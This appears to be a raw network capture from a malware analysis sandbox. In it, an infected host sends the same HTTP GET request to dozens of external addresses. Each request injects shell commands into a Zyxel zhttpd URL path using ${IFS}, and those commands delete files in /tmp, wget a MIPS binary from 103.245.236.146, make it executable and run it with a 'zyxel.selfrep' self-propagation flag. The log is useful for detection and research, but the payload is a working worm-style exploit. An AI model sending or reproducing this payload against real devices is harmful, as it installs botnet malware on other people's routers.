                                                Jan 28, 2024 10:16:20.741292953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3150192.168.2.236094092.202.40.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741296053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3151192.168.2.236078452.136.160.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741338968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3152192.168.2.233312644.114.219.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741343021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3153192.168.2.2344790182.60.95.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741372108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3154192.168.2.2347294173.162.63.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741415024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3155192.168.2.2349048154.75.45.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741435051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3156192.168.2.234548047.140.231.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741453886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3157192.168.2.2343468183.142.93.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741482973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3158192.168.2.2342016203.188.13.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741518021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3159192.168.2.234837496.71.88.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741539955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3160192.168.2.233881823.75.186.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741561890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3161192.168.2.235536480.134.213.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741570950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3162192.168.2.234413048.3.173.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741616011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3163192.168.2.2359844197.4.99.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741631985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3164192.168.2.235467689.19.45.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741652966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3165192.168.2.2357698163.31.142.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741692066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3166192.168.2.2339500159.151.238.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741729021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3167192.168.2.2342296216.238.7.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741743088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3168192.168.2.2348438197.83.39.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741786003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3169192.168.2.2358518106.187.170.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741791010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3170192.168.2.2342976151.157.25.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741828918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3171192.168.2.233288267.243.55.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741857052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3172192.168.2.2358146119.179.221.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741879940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3173192.168.2.2354734208.115.43.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741919041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3174192.168.2.2348352112.104.174.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741933107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3175192.168.2.2340624194.227.46.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741942883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3176192.168.2.234200653.213.181.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741978884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3177192.168.2.236085088.202.227.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742008924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3178192.168.2.2349084216.121.92.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742067099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3179192.168.2.2353512167.66.32.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742094994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3180192.168.2.234348235.206.63.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742125988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3181192.168.2.2347192157.171.170.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742150068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3182192.168.2.235940844.84.223.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742181063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3183192.168.2.233542892.184.142.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742212057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3184192.168.2.233827623.30.116.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742235899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3185192.168.2.2340080122.88.156.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742292881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3186192.168.2.234231869.121.4.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742326021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3187192.168.2.2344792185.96.233.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742335081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3188192.168.2.2351924131.82.75.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742360115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3189192.168.2.2343292175.160.105.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742377043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3190192.168.2.2360930113.209.192.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742410898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3191192.168.2.233633262.31.151.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742469072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192192.168.2.235379880.221.219.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742497921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3193192.168.2.236098659.191.180.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742578983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3194192.168.2.2347694190.107.241.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742634058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3195192.168.2.2336058165.156.221.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742657900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3196192.168.2.233820847.107.160.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742667913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3197192.168.2.234147258.30.231.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742724895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3198192.168.2.233412442.174.122.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742737055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3199192.168.2.2352556200.34.177.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742759943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3200192.168.2.2344312139.254.53.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742794037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3201192.168.2.2334656207.100.190.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742826939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3202192.168.2.2360012139.228.2.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742863894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3203192.168.2.2347760194.17.229.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742894888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3204192.168.2.2356906152.149.12.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742924929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3205192.168.2.2345412155.133.9.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742954969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3206192.168.2.2349836169.45.235.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.742996931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3207192.168.2.234662224.172.226.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743005991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3208192.168.2.2350102150.192.204.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743029118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3209192.168.2.2343740201.148.138.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743052006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3210192.168.2.234443063.176.56.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743072033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3211192.168.2.2354472195.170.239.87443
                                                TimestampBytes transferredDirectionData
